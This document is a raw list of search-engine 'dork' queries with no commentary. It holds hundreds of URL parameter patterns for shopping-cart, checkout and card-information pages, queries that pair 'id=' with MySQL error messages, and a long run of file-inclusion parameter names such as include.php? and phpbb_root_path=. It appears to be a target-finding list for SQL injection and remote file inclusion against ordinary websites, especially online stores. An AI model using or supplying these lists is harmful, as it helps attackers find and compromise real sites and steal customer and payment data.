+about.asp?cartID= +accinfo.asp?cartId= +acclogin.asp?cartID= +add.asp?bookid= +add_cart.asp?num= +addcart.asp? +addItem.asp +add-to-cart.asp?ID= +addToCart.asp?idProduct= +addtomylist.asp?ProdId= +adminEditProductFields.asp?intProdID= +advSearch_h.asp?idCategory= +affiliate.asp?ID= +affiliate-agreement.cfm?storeid= +affiliates.asp?id= +ancillary.asp?ID= +archive.asp?id= +article.asp?id= +aspx?PageID +basket.asp?id= +Book.asp?bookID= +book_list.asp?bookid= +book_view.asp?bookid= +BookDetails.asp?ID= +browse.asp?catid= +browse_item_details.asp +Browse_Item_Details.asp?Store_Id= +buy.asp? +buy.asp?bookid= +bycategory.asp?id= +cardinfo.asp?card= +cart.asp?action= +cart.asp?cart_id= +cart.asp?id= +cart_additem.asp?id= +cart_validate.asp?id= +cartadd.asp?id= +cat.asp?iCat= +catalog.asp +catalog.asp?CatalogID= +catalog_item.asp?ID= +catalog_main.asp?catid= +category.asp +category.asp?catid= +category_list.asp?id= +categorydisplay.asp?catid= +checkout.asp?cartid= +checkout.asp?UserID= +checkout_confirmed.asp?order_id= +checkout1.asp?cartid= +comersus_listCategoriesAndProducts.asp?idCategory= +comersus_optEmailToFriendForm.asp?idProduct= +comersus_optReviewReadExec.asp?idProduct= +comersus_viewItem.asp?idProduct= +comments_form.asp?ID= +contact.asp?cartId= +content.asp?id= +customerService.asp?****ID1= +default.asp?catID= +description.asp?bookid= +details.asp?BookID= +details.asp?Press_Release_ID= +details.asp?Product_ID= +details.asp?Service_ID= +display_item.asp?id= +displayproducts.asp +downloadTrial.asp?intProdID= +emailproduct.asp?itemid= +emailToFriend.asp?idProduct= +events.asp?ID= +faq.asp?cartID= +faq_list.asp?id= +faqs.asp?id= +feedback.asp?title= +freedownload.asp?bookid= +fullDisplay.asp?item= +getbook.asp?bookid= +GetItems.asp?itemid= +giftDetail.asp?id= +help.asp?CartId= +home.asp?id= +index.asp?cart= +index.asp?cartID= +index.asp?ID= +info.asp?ID= +item.asp?eid= +item.asp?item_id= +item.asp?itemid= +item.asp?model= +item.asp?prodtype= +item.asp?shopcd= +item_details.asp?catid= +item_list.asp?maingroup +item_show.asp?code_no= +itemDesc.asp?CartId= +itemdetail.asp?item= +itemdetails.asp?catalogid= +learnmore.asp?cartID= +links.asp?catid= +list.asp?bookid= +List.asp?CatID= + +listcategoriesandproducts.asp?idCategory= +modline.asp?id= +myaccount.asp?catid= +news.asp?id= +order.asp?BookID= +order.asp?id= +order.asp?item_ID= +OrderForm.asp?Cart= +page.asp?PartID= +payment.asp?CartID= +pdetail.asp?item_id= +powersearch.asp?CartId= +price.asp +privacy.asp?cartID= +prodbycat.asp?intCatalogID= +prodetails.asp?prodid= +prodlist.asp?catid= +product.asp?bookID= +product.asp?intProdID= +product_info.asp?item_id= +productDetails.asp?idProduct= +productDisplay.asp +productinfo.asp?item= +productlist.asp?ViewType=Category&CategoryID= +productpage.asp +products.asp?ID= +products.asp?keyword= +products_category.asp?CategoryID= +products_detail.asp?CategoryID= +productsByCategory.asp?intCatalogID= +prodView.asp?idProduct= +promo.asp?id= +promotion.asp?catid= +pview.asp?Item= +resellers.asp?idCategory= +results.asp?cat= +savecart.asp?CartId= +search.asp?CartID= +searchcat.asp?search_id= +Select_Item.asp?id= +Services.asp?ID= +shippinginfo.asp?CartId= +shop.asp?a= +shop.asp?action= +shop.asp?bookid= +shop.asp?cartID= +shop_details.asp?prodid= +shopaddtocart.asp +shopaddtocart.asp?catalogid= +shopbasket.asp?bookid= +shopbycategory.asp?catid= +shopcart.asp?title= +shopcreatorder.asp +shopcurrency.asp?cid= +shopdc.asp?bookid= +shopdisplaycategories.asp +shopdisplayproduct.asp?catalogid= +shopdisplayproducts.asp +shopexd.asp +shopexd.asp?catalogid= +shopping_basket.asp?cartID= +shopprojectlogin.asp +shopquery.asp?catalogid= +shopremoveitem.asp?cartid= +shopreviewadd.asp?id= +shopreviewlist.asp?id= +ShopSearch.asp?CategoryID= +shoptellafriend.asp?id= +shopthanks.asp +shopwelcome.asp?title= +show_item.asp?id= +show_item_details.asp?item_id= +showbook.asp?bookid= +showStore.asp?catID= +shprodde.asp?SKU= +specials.asp?id= +store.asp?id= +store_bycat.asp?id= +store_listing.asp?id= +Store_ViewProducts.asp?Cat= +store-details.asp?id= +storefront.asp?id= +storefronts.asp?title= +storeitem.asp?item= +StoreRedirect.asp?ID= +subcategories.asp?id= +tek9.asp? +template.asp?Action=Item&pid= +topic.asp?ID= +tuangou.asp?bookid= +type.asp?iType= +updatebasket.asp?bookid= +updates.asp?ID= +view.asp?cid= +view_cart.asp?title= +view_detail.asp?ID= +viewcart.asp?CartId= +viewCart.asp?userID= +viewCat_h.asp?idCategory= +viewevent.asp?EventID= +viewitem.asp?recor= +viewPrd.asp?idcategory= +ViewProduct.asp?misc= +voteList.asp?item_ID= +whatsnew.asp?idCategory= +WsAncillary.asp?ID= +WsPages.asp?ID=noticiasDetalle.asp?xid= +sitio/item.asp?idcd= +index.asp?site= +de/content.asp?page_id= +gallerysort.asp?iid= +products.asp?type= +event.asp?id= +showfeature.asp?id= +home.asp?ID= +tas/event.asp?id= +profile.asp?id= +details.asp?id= +past-event.asp?id= +index.asp?action= +site/products.asp?prodid= +page.asp?pId= +resources/vulnerabilities_list.asp?id= +site.asp?id= +products/index.asp?rangeid= +global_projects.asp?cid= +publications/view.asp?id= +display_page.asp?id= +pages.asp?ID= +lmsrecords_cd.asp?cdid= +product.asp?prd= +cat/?catid= +products/product-list.asp?id= +debate-detail.asp?id= +cbmer/congres/page.asp?LAN= +content.asp?id= +news.asp?ID= +photogallery.asp?id= +index.asp?id= +product/product.asp?product_no= +nyheder.htm?show= +book.asp?ID= +print.asp?id= +detail.asp?id= +book.asp?id= +content.asp?PID= +more_detail.asp?id= +content.asp?id= +view_items.asp?id= +view_author.asp?id= +main.asp?id= +english/fonction/print.asp?id= +magazines/adult_magazine_single_page.asp?magid= +product_details.asp?prodid= +magazines/adult_magazine_full_year.asp?magid= +products/card.asp?prodID= +catalog/product.asp?cat_id= +e_board/modifyform.html?code= +community/calendar-event-fr.asp?id= +products.asp?p= +news.asp?id= +view/7/9628/1.html?reply= +product_details.asp?prodid= +catalog/product.asp?pid= +rating.asp?id= +?page= +catalog/main.asp?cat_id= +index.asp?page= +detail.asp?prodid= +products/product.asp?pid= +news.asp?id= +book_detail.asp?BookID= +catalog/main.asp?cat_id= +catalog/main.asp?cat_id= +default.asp?cPath= +catalog/main.asp?cat_id= +catalog/main.asp?cat_id= +category.asp?catid= +categories.asp?cat= +categories.asp?cat= +detail.asp?prodID= +detail.asp?id= +category.asp?id= +hm/inside.asp?id= +index.asp?area_id= +gallery.asp?id= +products.asp?cat= +products.asp?cat= +media/pr.asp?id= +books/book.asp?proj_nr= +products/card.asp?prodID= +general.asp?id= +news.asp?t= +usb/devices/showdev.asp?id= +content/detail.asp?id= +templet.asp?acticle_id= +news/news/title_show.asp?id= +product.asp?id= +index.asp?url= +cryolab/content.asp?cid= +ls.asp?id= +s.asp?w= +abroad/page.asp?cid= +bayer/dtnews.asp?id= +news/temp.asp?id= +index.asp?url= +book/bookcover.asp?bookid= +index.asp/en/component/pvm/?view= +product/list.asp?pid= +cats.asp?cat= +software_categories.asp?cat_id= +print.asp?sid= +docDetail.aspx?chnum= +index.asp?section= +index.asp?page= +index.asp?page= +en/publications.asp?id= +events/detail.asp?ID= +forum/profile.asp?id= +media/pr.asp?id= +content.asp?ID= +cloudbank/detail.asp?ID= +pages.asp?id= +news.asp?id= +beitrag_D.asp?id= +content/index.asp?id= +index.asp?i= +?action= +index.asp?page= +beitrag_F.asp?id= +index.asp?pageid= +page.asp?modul= +detail.asp?id= +index.asp?w= +index.asp?modus= +news.asp?id= +news.asp?id= +aktuelles/meldungen-detail.asp?id= +item.asp?id= +obio/detail.asp?id= +page/de/produkte/produkte.asp?prodID= +packages_display.asp?ref= +shop/index.asp?cPath= +modules.asp?bookid= +product-range.asp?rangeID= +en/news/fullnews.asp?newsid= +deal_coupon.asp?cat_id= +show.asp?id= +blog/index.asp?idBlog= +redaktion/whiteteeth/detail.asp?nr= +HistoryStore/pages/item.asp?itemID= +aktuelles/veranstaltungen/detail.asp?id= +tecdaten/showdetail.asp?prodid= +?id= +rating/stat.asp?id= +content.asp?id= +viewapp.asp?id= +item.asp?id= +news/newsitem.asp?newsID= +FernandFaerie/index.asp?c= +show.asp?id= +?cat= +categories.asp?cat= +category.asp?c= + +product_info.asp?id= +prod.asp?cat= +store/product.asp?productid= +browsepr.asp?pr= +product-list.asp?cid= +products.asp?cat_id= +product.asp?ItemID= +category.asp?c= +main.asp?id= +article.asp?id= +showproduct.asp?productId= +view_item.asp?item= +skunkworks/content.asp?id= +index.asp?id= +item_show.asp?id= +publications.asp?Id= +index.asp?t= +view_items.asp?id= +portafolio/portafolio.asp?id= +YZboard/view.asp?id= +index_en.asp?ref= +index_en.asp?ref= +category.asp?id_category= +main.asp?id= +main.asp?id= +calendar/event.asp?id= +default.asp?cPath= +pages/print.asp?id= +index.asp?pg_t= +_news/news.asp?id= +forum/showProfile.asp?id= +fr/commande-liste-categorie.asp?panier= +downloads/shambler.asp?id= +sinformer/n/imprimer.asp?id= +More_Details.asp?id= +directory/contenu.asp?id_cat= +properties.asp?id_cat= +forum/showProfile.asp?id= +downloads/category.asp?c= +index.asp?cat= +product_info.asp?products_id= +product_info.asp?products_id= +product-list.asp?category_id= +detail.asp?siteid= +projects/event.asp?id= +view_items.asp?id= +more_details.asp?id= +melbourne_details.asp?id= +more_details.asp?id= +detail.asp?id= +more_details.asp?id= +home.asp?cat= +idlechat/message.asp?id= +detail.asp?id= +print.asp?sid= +more_details.asp?id= +default.asp?cPath= +events/event.asp?id= +brand.asp?id= +toynbeestudios/content.asp?id= +show-book.asp?id= +more_details.asp?id= +store/default.asp?cPath= +property.asp?id= +product_details.asp?id= +more_details.asp?id= +view-event.asp?id= +content.asp?id= +book.asp?id= +page/venue.asp?id= +print.asp?sid= +colourpointeducational/more_details.asp?id= +print.asp?sid= +browse/book.asp?journalID= +section.asp?section= +bookDetails.asp?id= +profiles/profile.asp?profileid= +event.asp?id= +gallery.asp?id= +category.asp?CID= +corporate/newsreleases_more.asp?id= +print.asp?id= +view_items.asp?id= +more_details.asp?id= +county-facts/diary/vcsgen.asp?id= +idlechat/message.asp?id= +podcast/item.asp?pid= +products.asp?act= +details.asp?prodId= +socsci/events/full_details.asp?id= +ourblog.asp?categoryid= +mall/more.asp?ProdID= +archive/get.asp?message_id= +review/review_form.asp?item_id= +english/publicproducts.asp?groupid= +news_and_notices.asp?news_id= +rounds-detail.asp?id= +gig.asp?id= +board/view.asp?no= +index.asp?modus= +news_item.asp?id= +rss.asp?cat= +products/product.asp?id= +details.asp?ProdID= +els_/product/product.asp?id= +store/description.asp?iddesc= +socsci/news_items/full_story.asp?id= +modules/forum/index.asp?topic_id= +feature.asp?id= +products/Blitzball.htm?id= +profile_print.asp?id= +questions.asp?questionid= +html/scoutnew.asp?prodid= +main/index.asp?action= +********.asp?cid= +********.asp?cid= +news.asp?type= +index.asp?page= +viewthread.asp?tid= +summary.asp?PID= +news/latest_news.asp?cat_id= +index.asp?cPath= +category.asp?CID= +index.asp?pid= +more_details.asp?id= +specials.asp?osCsid= +search/display.asp?BookID= +articles.asp?id= +print.asp?sid= +page.asp?id= +more_details.asp?id= +newsite/pdf_show.asp?id= +shop/category.asp?cat_id= +shopcafe-shop-product.asp?bookId= +shop/books_detail.asp?bookID= +index.asp?cPath= +more_details.asp?id= +news.asp?id= +more_details.asp?id= +shop/books_detail.asp?bookID= +more_details.asp?id= +blog.asp?blog= +index.asp?pid= +prodotti.asp?id_cat= +category.asp?CID= +more_details.asp?id= +poem_list.asp?bookID= +more_details.asp?id= +content.asp?categoryId= +authorDetails.asp?bookID= +press_release.asp?id= +item_list.asp?cat_id= +colourpointeducational/more_details.asp?id= +index.asp?pid= +download.asp?id= +shop/category.asp?cat_id= +i-know/content.asp?page= +store/index.asp?cat_id= +yacht_search/yacht_view.asp?pid= +pharmaxim/category.asp?cid= +print.asp?sid= +specials.asp?osCsid= +store.asp?cat_id= +category.asp?cid= +displayrange.asp?rangeid= +product.asp?id= +csc/news-details.asp?cat= +products-display-details.asp?prodid= +stockists_list.asp?area_id= +news/newsitem.asp?newsID= +index.asp?pid= +newsitem.asp?newsid= +category.asp?id= +news/newsitem.asp?newsID= +details.asp?prodId= +publications/publication.asp?id= +purelydiamond/products/category.asp?cat= +category.asp?cid= +product/detail.asp?id= +news/newsitem.asp?newsID= +details.asp?prodID= +item.asp?item_id= +edition.asp?area_id= +page.asp?area_id= +view_newsletter.asp?id= +library.asp?cat= +categories.asp?cat= +page.asp?area_id= +categories.asp?cat= +publications.asp?id= +item.asp?sub_id= +page.asp?area_id= +page.asp?area_id= +category.asp?catid= +content.asp?cID= +newsitem.asp?newsid= +frontend/category.asp?id_category= +news/newsitem.asp?newsID= +things-to-do/detail.asp?id= +page.asp?area_id= +page.asp?area_id= +listing.asp?cat= +item.asp?iid= +customer/home.asp?cat= +staff/publications.asp?sn= +news/newsitem.asp?newsID= +library.asp?cat= +main/index.asp?uid= +library.asp?cat= +shop/eventshop/product_detail.asp?itemid= +news/newsitem.asp?newsID= +news/newsitem.asp?newsID= +library.asp?cat= +FullStory.asp?Id= +publications.asp?ID= +publications/book_reviews/full_review.asp?id= +newsitem.asp?newsID= +newsItem.asp?newsId= +site/en/list_service.asp?cat= +page.asp?area_id= +product.asp?ProductID= +releases_headlines_details.asp?id= +product.asp?shopprodid= +product.asp?productid= +product.asp?product= +product.asp?product_id= +productlist.asp?id= +product.asp?shopprodid= +garden_equipment/pest-weed-control/product.asp?pr= +product.asp?shopprodid= +browsepr.asp?pr= +productlist.asp?id= +kshop/product.asp?productid= +product.asp?pid= +showproduct.asp?prodid= +product.asp?productid= +productlist.asp?id= +index.asp?pageId= +productlist.asp?tid= +product-list.asp?id= +onlinesales/product.asp?product_id= +garden_equipment/Fruit-Cage/product.asp?pr= +product.asp?shopprodid= +product_info.asp?products_id= +productlist.asp?tid= +showsub.asp?id= +productlist.asp?fid= +products.asp?cat= +products.asp?cat= +product-list.asp?id= +product.asp?sku= +store/product.asp?productid= +products.asp?cat= +productList.asp?cat= +product_detail.asp?product_id= +product.asp?pid= +wiki/pmwiki.asp?page****= +summary.asp?PID= +productlist.asp?grpid= +cart/product.asp?productid= +db/CART/product_details.asp?product_id= +ProductList.asp?id= +products/product.asp?id= +product.asp?shopprodid= +product_info.asp?products_id= +product_ranges_view.asp?ID= +cei/cedb/projdetail.asp?projID= +products.asp?DepartmentID= +product.asp?shopprodid= +product.asp?shopprodid= +product_info.asp?products_id= +index.asp?news= +education/content.asp?page= +Interior/productlist.asp?id= +products.asp?categoryID= +modules.asp?****= +message/comment_threads.asp?postID= +artist_art.asp?id= +products.asp?cat= +index.asp?option= +ov_tv.asp?item= +index.asp?lang= +showproduct.asp?cat= +index.asp?lang= +product.asp?bid= +product.asp?bid= +cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId= +item_show.asp?lid= +?pagerequested= +downloads.asp?id= +print.asp?sid= +print.asp?sid= +product.asp?intProductID= +productList.asp?id= +product.asp?intProductID= +more_details.asp?id= +more_details.asp?id= +books.asp?id= +index.asp?offs= +mboard/replies.asp?parent_id= +Computer Science.asp?id= +news.asp?id= +pdf_post.asp?ID= +reviews.asp?id= +art.asp?id= +prod.asp?cat= +event_info.asp?p= +view_items.asp?id= +home.asp?cat= +item_book.asp?CAT= +www/index.asp?page= +schule/termine.asp?view= +goods_detail.asp?data= +storemanager/contents/item.asp?page_code= +view_items.asp?id= +customer/board.htm?mode= +help/com_view.html?code= +n_replyboard.asp?typeboard= +eng_board/view.asp?T****= +prev_results.asp?prodID= +bbs/view.asp?no= +gnu/?doc= +zb/view.asp?uid= +global/product/product.asp?gubun= +inurl:”.php?cat=”+intext:”Paypal”+site:UK + +inurl:”.php?cat=”+intext:”/Buy Now/”+site:.net + +inurl:”.php?cid=”+intext:”online+betting” + +inurl:”.php?id=” intext:”View cart” + +inurl:”.php?id=” intext:”Buy Now” + +inurl:”.php?id=” intext:”add to cart” + +inurl:”.php?id=” intext:”shopping” + +inurl:”.php?id=” intext:”boutique” + +inurl:”.php?id=” intext:”/store/” + +inurl:”.php?id=” intext:”/shop/” + +inurl:”.php?id=” intext:”toys” + +inurl:”.php?cid=” + +inurl:”.php?cid=” intext:”shopping” + +inurl:”.php?cid=” intext:”add to cart” + +inurl:”.php?cid=” intext:”Buy Now” + +inurl:”.php?cid=” intext:”View cart” + +inurl:”.php?cid=” intext:”boutique + +inurl:”.php?cid=” intext:”/store/” + +inurl:”.php?cid=” intext:”/shop/” + +inurl:”.php?cid=” intext:”Toys” + +inurl:”.php?cat=” + +inurl:”.php?cat=” intext:”shopping” + +inurl:”.php?cat=” intext:”add to cart” + +inurl:”.php?cat=” intext:”Buy Now” + +inurl:”.php?cat=” intext:”View cart” + +inurl:”.php?cat=” intext:”boutique + +” inurl:”.php?cat=” intext:”/store/” + +inurl:”.php?cat=” intext:”/shop/” + +inurl:”.php?cat=” intext:”Toys” + +inurl:”.php?catid=” + +inurl:”.php?catid=” intext:”View cart” + +inurl:”.php?catid=” intext:”Buy Now” + +inurl:”.php?catid=” intext:”add to cart” + +inurl:”.php?catid=” intext:”shopping” + +inurl:”.php?catid=” intext:”boutique” + +inurl:”.php?catid=” intext:”/store/” + +inurl:”.php?catid=” intext:”/shop/” + +inurl:”.php?catid=” intext:”Toys” + +inurl:”.php?categoryid=” + +inurl:”.php?categoryid=” intext:”View cart” + +inurl:”.php?categoryid=” intext:”Buy Now” + +inurl:”.php?categoryid=” intext:”add to cart” + +inurl:”.php?categoryid=” intext:”shopping” + +inurl:”.php?categoryid=” intext:”boutique” + +inurl:”.php?categoryid=” intext:”/store/” + +inurl:”.php?categoryid=” intext:”/shop/” + +inurl:”.php?categoryid=” intext:”Toys” + +inurl:”.php?pid=” + +inurl:”.php?pid=” intext:”shopping” + +inurl:”.php?pid=” intext:”add to cart” + +inurl:”.php?pid=” intext:”Buy Now” + +inurl:”.php?pid=” intext:”View cart” + +inurl:”.php?pid=” intext:”boutique” + +cat.asp?cat= +productlist.asp?catalogid= + +Category.asp?category_id= + +Category.cfm?category_id= + +category.asp?cid= + +category.cfm?cid= + +category.asp?cat= + +category.cfm?cat= + +category.asp?id= + +index.cfm?pageid= + +category.asp?catid= + +Category.asp?c= + +Category.cfm?c= + +productlist.cfm?catalogid= + +productlist.asp?catalogid= + +viewitem.asp?catalogid= + +viewitem.cfm?catalogid= + +catalog.cfm?catalogId= + +catalog.asp?catalogId= + +department.cfm?dept= + +department.asp?dept= + +itemdetails.cfm?catalogId= + +itemdetails.asp?catalogId= + +product_detail.asp?catalogid= + +product_detail.cfm?catalogid= + +product_list.asp?catalogid= + +product_list.cfm?catalogid= + +ShowProduct.cfm?CatID= + +ShowProduct.asp?CatID= + +search_results.cfm?txtsearchParamCat= + +search_results.asp?txtsearchParamCat= + +itemdetails.cfm?catalogId= + +itemdetails.asp?catalogId= + +store-page.cfm?go= + +store-page.asp?go= + +Detail.cfm?CatalogID= + +Detail.asp?CatalogID= + +browse.cfm?category_id= + +view.cfm?category_id= + +products.cfm?category_id= + +index.cfm?Category_ID= + +detail.cfm?id= + +category.cfm?id= + +showitems.cfm?category_id= + +ViewProduct.asp?PID= + +ViewProduct.cfm?PID= + +shopdisplayproducts.asp?catalogid= + +shopdisplayproducts.cfn?catalogid= + +displayproducts.cfm?category_id= + +displayproducts.asp?category_id= + +DisplayProducts.asp?prodcat= + +DisplayProducts.cfm?prodcat=x + +productDetail.cfm?ProductID= + +products.php?subcat_id= + +showitem.cfm?id=21 + +productdetail.cfm?pid= + +default.cfm?action=46 + +products_accessories.asp?CatId= + +Store_ViewProducts.asp?Cat= + +category.cfm?categoryID= + +category.asp?category= + +tepeecart.cfm?shopid= + +view_product.asp?productID= + +ProductDetails.asp?prdId=12 + +products.cfm?ID= + +detail.asp?product_id= + +product_detail.asp?product_id= + +products.php?subcat_id= + +product.php?product_id= + +view_product.cfm?productID= + +product_details.asp?prodid= + +shopdisplayproducts.cfm?id= + +displayproducts.cfm?id= +trainers.php?id= +play_old.php?id= +declaration_more.php?decl_id= +Pageid= +games.php?id= +newsDetail.php?id= +staff_id= +historialeer.php?num= +product-item.php?id= +news_view.php?id= +humor.php?id= +communique_detail.php?id= +sem.php3?id= +opinions.php?id= +spr.php?id= +pages.php?id= +chappies.php?id= +prod_detail.php?id= +viewphoto.php?id= +view.php?id= +website.php?id= +hosting_info.php?id= +gery.php?id= +detail.php?ID= +publications.php?id= +Productinfo.php?id= +releases.php?id= +ray.php?id= +produit.php?id= +pop.php?id= +shopping.php?id= +productdetail.php?id= +post.php?id= +section.php?id= +theme.php?id= +page.php?id= +shredder-categories.php?id= +product_ranges_view.php?ID= +shop_category.php?id= +channel_id= +newsid= +news_display.php?getid= +ages.php?id= +clanek.php4?id= +review.php?id= +iniziativa.php?in= +curriculum.php?id= +labels.php?id= +look.php?ID= +galeri_info.php?l= +tekst.php?idt= +newscat.php?id= +newsticker_info.php?idn= +rubrika.php?idr= +offer.php?idf= +“id=” & intext:”Warning: mysql_fetch_array() +“id=” & intext:”Warning: getimagesize() +“id=” & intext:”Warning: session_start() +“id=” & intext:”Warning: mysql_num_rows() +“id=” & intext:”Warning: mysql_query() +“id=” & intext:”Warning: array_merge() +“id=” & intext:”Warning: preg_match() +“id=” & intext:”Warning: ilesize() +“id=” & intext:”Warning: filesize() +index.php?id= +buy.php?category= +article.php?ID= +play_old.php?id= +newsitem.php?num= +top10.php?cat= +historialeer.php?num= +reagir.php?num= +Stray-Questions-View.php?num= +forum_bds.php?num= +game.php?id= +view_product.php?id= +sw_comment.php?id= +news.php?id= +avd_start.php?avd= +event.php?id= +sql.php?id= +news_view.php?id= +select_biblio.php?id= +humor.php?id= +ogl_inet.php?ogl_id= +fiche_spectacle.php?id= +communique_detail.php?id= +sem.php3?id= +kategorie.php4?id= +faq2.php?id= +show_an.php?id= +preview.php?id= +loadpsb.php?id= +opinions.php?id= +spr.php?id= +announce.php?id= +participant.php?id= +download.php?id= +main.php?id= +review.php?id= +chappies.php?id= +read.php?id= +prod_detail.php?id= +article.php?id= +person.php?id= +productinfo.php?id= +showimg.php?id= +view.php?id= +website.php?id= +hosting_info.php?id= +gery.php?id= +rub.php?idr= +view_faq.php?id= +artikelinfo.php?id= +detail.php?ID= +index.php?= +profile_view.php?id= +category.php?id= +publications.php?id= +fellows.php?id= +downloads_info.php?id= +prod_info.php?id= +shop.php?do=part&id= +collectionitem.php?id= +band_info.php?id= +product.php?id= +releases.php?id= +ray.php?id= +produit.php?id= +pop.php?id= +shopping.php?id= +productdetail.php?id= +post.php?id= +viewshowdetail.php?id= +clubpage.php?id= +memberInfo.php?id= +section.php?id= +theme.php?id= +page.php?id= +shredder-categories.php?id= +tradeCategory.php?id= +product_ranges_view.php?ID= +shop_category.php?id= +transcript.php?id= +channel_id= +item_id= +newsid= +trainers.php?id= +news-full.php?id= +news_display.php?getid= +index2.php?option= +readnews.php?id= +newsone.php?id= +product-item.php?id= +pages.php?id= +clanek.php4?id= +viewapp.php?id= + +viewphoto.php?id= +galeri_info.php?l= +iniziativa.php?in= +curriculum.php?id= +labels.php?id= +story.php?id= +look.php?ID= +aboutbook.php?id= +“id=” & intext:”Warning: mysql_fetch_assoc() +“id=” & intext:”Warning: is_writable() +“id=” & intext:”Warning: Unknown() +“id=” & intext:”Warning: mysql_result() +“id=” & intext:”Warning: pg_exec() +“id=” & intext:”Warning: require() +buy.php?category= +pageid= +page.php?file= +show.php?id= +newsitem.php?num= +readnews.php?id= +top10.php?cat= +reagir.php?num= +Stray-Questions-View.php?num= +forum_bds.php?num= +game.php?id= +view_product.php?id= +sw_comment.php?id= +news.php?id= +avd_start.php?avd= +event.php?id= +sql.php?id= +select_biblio.php?id= +ogl_inet.php?ogl_id= +fiche_spectacle.php?id= +kategorie.php4?id= +faq2.php?id= +show_an.php?id= +loadpsb.php?id= +announce.php?id= +participant.php?id= +download.php?id= +article.php?id= +person.php?id= +productinfo.php?id= +showimg.php?id= +rub.php?idr= +view_faq.php?id= +artikelinfo.php?id= +index.php?= +profile_view.php?id= +category.php?id= +fellows.php?id= +downloads_info.php?id= +prod_info.php?id= +shop.php?do=part&id= +collectionitem.php?id= +band_info.php?id= +product.php?id= +viewshowdetail.php?id= +clubpage.php?id= +memberInfo.php?id= +tradeCategory.php?id= +transcript.php?id= +item_id= +news-full.php?id= +aboutbook.php?id= +preview.php?id= +material.php?id= +read.php?id= +viewapp.php?id= +story.php?id= +newsone.php?id= +rubp.php?idr= +art.php?idm= +title.php?id= +index1.php?modo= +include.php?*[*]*= +nota.php?pollname= +index3.php?p= +padrao.php?pre= +home.php?pa= +main.php?type= +sitio.php?start= +*.php?include= +general.php?xlink= +show.php?go= +nota.php?ki= +down*.php?oldal= +layout.php?disp= +enter.php?chapter= +base.php?incl= +enter.php?mod= +show.php?corpo= +head.php?*[*]*= +info.php?strona= +template.php?str= +main.php?doshow= +view.php?*[*]*= +index.php?to= +page.php?cmd= +view.php?b= +info.php?option= +show.php?x= +template.php?texto= +index3.php?ir= +print.php?chapter= +file.php?inc= +file.php?cont= +view.php?cmd= +include.php?chapter= +path.php?my= +principal.php?param= +general.php?menue= +index1.php?b= +info.php?chapter= +nota.php?chapter= +general.php?include= +start.php?addr= +index1.php?qry= +index1.php?loc= +page.php?addr= +index1.php?dir= +principal.php?pr= +press.php?seite= +head.php?cmd= +home.php?sec= +home.php?category= +standard.php?cmd= +mod*.php?thispage= +base.php?to= +view.php?choix= +base.php?panel= +template.php?mod= +info.php?j= +blank.php?pref= +sub*.php?channel= +standard.php?in= +general.php?cmd= +pagina.php?panel= +template.php?where= +path.php?channel= +gery.php?seccion= +page.php?tipo= +sitio.php?rub= +pagina.php?u= +file.php?ir= +*inc*.php?sivu= +path.php?start= +page.php?chapter= +home.php?recipe= +enter.php?pname= +layout.php?path= +print.php?open= +mod*.php?channel= +down*.php?phpbb_root_path= +*inc*.php?str= +gery.php?phpbb_root_path= +include.php?middlePart= +sub*.php?destino= +info.php?read= +home.php?sp= +main.php?strona= +sitio.php?get= +sitio.php?index= +index3.php?option= +enter.php?a= +main.php?second= +print.php?pname= +blank.php?itemnav= +blank.php?pagina= +index1.php?d= +down*.php?where= +*inc*.php?include= +path.php?pre= +home.php?loader= +start.php?eval= +index.php?disp= +head.php?mod= +sitio.php?section= +nota.php?doshow= +home.php?seite= +home.php?a= +page.php?url= +pagina.php?left= +layout.php?c= +principal.php?goto= +standard.php?base_dir= +home.php?where= +page.php?sivu= +*inc*.php?adresa= +padrao.php?str= +include.php?my= +show.php?home= +index.php?load= +index3.php?rub= +sub*.php?str= +start.php?index= +nota.php?mod= +sub*.php?mid= +index1.php?*[*]*= +pagina.php?oldal= +padrao.php?loc= +padrao.php?rub= +page.php?incl= +gery.php?disp= +nota.php?oldal= +include.php?u= +principal.php?pagina= +print.php?choix= +head.php?filepath= +include.php?corpo= +sub*.php?action= +head.php?pname= +press.php?dir= +show.php?xlink= +file.php?left= +nota.php?destino= +general.php?module= +index3.php?redirect= +down*.php?param= +default.php?ki= +padrao.php?h= +padrao.php?read= +mod*.php?cont= + +index1.php?l= +down*.php?pr= +gery.php?viewpage= +template.php?load= +nota.php?pr= +padrao.php?destino= +index2.php?channel= +principal.php?opcion= +start.php?str= +press.php?*[*]*= +index.php?ev= +pagina.php?pre= +nota.php?content= +include.php?adresa= +sitio.php?t= +index.php?sivu= +principal.php?q= +path.php?ev= +print.php?module= +index.php?loc= +nota.php?basepath= +padrao.php?tipo= +index2.php?in= +principal.php?eval= +file.php?qry= +info.php?t= +enter.php?play= +general.php?var= +principal.php?s= +standard.php?pagina= +standard.php?subject= +base.php?second= +head.php?inc= +pagina.php?basepath= +main.php?pname= +*inc*.php?modo= +include.php?goto= +file.php?pg= +head.php?g= +general.php?header= +start.php?*root*= +enter.php?pref= +index3.php?open= +start.php?module= +main.php?load= +enter.php?pg= +padrao.php?redirect= +pagina.php?my= +gery.php?pre= +enter.php?w= +info.php?texto= +enter.php?open= +base.php?rub= +gery.php?*[*]*= +include.php?cmd= +standard.php?dir= +layout.php?page= +index3.php?pageweb= +include.php?numero= +path.php?destino= +index3.php?home= +default.php?seite= +path.php?eval= +base.php?choix= +template.php?cont= +info.php?pagina= +default.php?x= +default.php?option= +gery.php?ki= +down*.php?second= +blank.php?path= +pagina.php?v= +file.php?pollname= +index3.php?var= +layout.php?goto= +pagina.php?incl= +home.php?action= +include.php?oldal= +print.php?left= +print.php?u= +nota.php?v= +home.php?str= +press.php?panel= +page.php?mod= +default.php?param= +down*.php?texto= +mod*.php?dir= +view.php?where= +blank.php?subject= +path.php?play= +base.php?l= +index2.php?rub= +general.php?opcion= +layout.php?xlink= +padrao.php?name= +pagina.php?nivel= +default.php?oldal= +template.php?k= +main.php?chapter= +layout.php?chapter= +layout.php?incl= +include.php?url= +base.php?sivu= +index.php?link= +sub*.php?cont= +info.php?oldal= +general.php?rub= +default.php?str= +head.php?ev= +sub*.php?path= +view.php?page= +main.php?j= +index2.php?basepath= +gery.php?qry= +main.php?url= +default.php?incl= +show.php?redirect= +index1.php?pre= +general.php?base_dir= +start.php?in= +show.php?abre= +index1.php?home= +home.php?ev= +index2.php?ki= +base.php?pag= +default.php?ir= +general.php?qry= +index2.php?home= +press.php?nivel= +enter.php?pr= +blank.php?loader= +start.php?cmd= +padrao.php?d= +sitio.php?recipe= +principal.php?read= +standard.php?showpage= +main.php?pg= +page.php?panel= 